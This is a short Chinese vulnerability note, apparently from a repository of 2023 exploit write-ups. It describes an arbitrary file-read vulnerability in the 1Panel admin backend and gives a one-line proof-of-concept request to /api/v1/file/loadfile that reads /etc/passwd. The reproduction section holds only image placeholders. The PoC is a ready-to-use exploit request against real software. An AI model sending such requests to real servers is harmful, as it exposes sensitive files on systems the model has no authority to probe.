Projects STRLCPY 2023Hvv Files
🤬
main
ROOT /
1Panel loadfile 后台文件读取漏洞.md
17 lines | UTF-8 | 538 bytes

漏洞描述

1Panel后台存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息文件

POC

POST /api/v1/file/loadfile {"paht":"/etc/passwd"}

漏洞复现

登陆页面

image-20230815142616338

image-20230815142623048

image-20230815142629323

Please wait...
Page is in error, reload to recover